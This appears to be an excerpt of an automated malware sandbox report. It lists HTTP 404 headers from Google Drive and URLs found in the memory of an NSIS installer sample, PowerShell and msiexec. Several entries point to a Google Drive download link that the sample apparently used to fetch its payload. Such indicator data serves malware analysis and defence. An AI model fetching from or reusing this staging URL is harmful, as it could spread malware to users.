Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:25 GMTContent-Security-Policy: script-src 'nonce-MmCWXCiBn911DADyFXUfwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC54h9p9IrBpDuPfnACo7yUfpSsxQZL_qcJgTpO7yZtlqm-MKYBc2wItF4ucy4Z2P60eWml95GXazgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:31 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7gmziVAhN04C73TTRS4UVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC6WpkrE1dTEJUYvrf3F0J3AHqplaTy679_MyfYxo0DYzRanxSZBBHU8M16l-NY47OEHfaNdnkxraAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:37 GMTContent-Security-Policy: script-src 'nonce-5DhTH4YSDDw4HdM0PoGYsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC65Cln_I8TLMf4RVCfAT3Ygs_nejFlHeRcnrQGl_d_cP8989dOR8vXOvbrzzYRBG0VeE039mTIwawServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:42 GMTContent-Security-Policy: script-src 'nonce-Q2mJrjB3FJ-sa2acuUDKMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC4sgYGX8MDEjxSc-CtiXmNO-kkPq2NyrH84jAO_8C9qkiyyiyQ4dhpO4Wwe3Go5UG3Uu3Yx3RUV0AServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:48 GMTContent-Security-Policy: script-src 'nonce-HhofEG0nNP6P9KUecNOClw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC5WG4ekfceJreGtYog4yN3l62EE0uPVrr_utvRJmE3A4UAjFNZC4DvG1I3QUvMb_a9KC6ZVyZKK_QServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:53 GMTContent-Security-Policy: script-src 'nonce-L6Y-BSH-leork-yuznsohg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC5zv0sc2tom8ulZKyxqIXmNLj5ofdZ2C9qHAwERI5s9nUEw0-cdDX1wN1fgk4sMpW5RGiaRolZ8ugServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:59 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-5u_aELJgQcxXQRneYHJ_bQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC6q7JIspnS2vBysMyt0_LXY8EGBdX-GFKFfnZcJ9pam3s21yzbqVHekFt0pKhEJQi6DfKc4i1skiAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close

Source: AwMu7gR48D.exe, AwMu7gR48D.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: AwMu7gR48D.exe, AwMu7gR48D.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.1850926327.0000000005F05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1839618822.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1839618822.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1839618822.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1855442072.000000000751A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000002.00000002.1839618822.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: msiexec.exe, 00000005.00000002.2678783138.000000000625E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1971022665.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.000000000625D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.1850926327.0000000005F05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1850926327.0000000005F05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1850926327.0000000005F05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000005.00000002.2678783138.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584795556.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669151935.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472874421.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502712541.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640640069.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613309927.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557277262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=d
Source: msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/(gv
Source: msiexec.exe, 00000005.00000003.2111129957.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083732633.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2055895124.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2000433633.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027572606.0000000006259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/GT
Source: msiexec.exe, 00000005.00000003.2111145432.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027647702.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613416047.00000000061EF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502788314.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417445942.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083790654.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557342511.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221518528.00000000061EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/S
Source: msiexec.exe, 00000005.00000003.2445831272.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166300357.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584795556.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111129957.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248826838.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138530544.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194101706.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276930704.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669151935.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472874421.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417373844.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359320119.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502712541.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332761660.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640640069.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221471719.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613309927.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557277262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/U
Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613349162.0000000006212000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/ertificates
Source: msiexec.exe, 00000005.00000003.2000450554.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027596508.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2055912606.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/h
Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/ificate
Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2000450554.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027596508.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/n
Source: msiexec.exe, 00000005.00000003.2332761660.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640640069.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221471719.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613309927.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557277262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=do
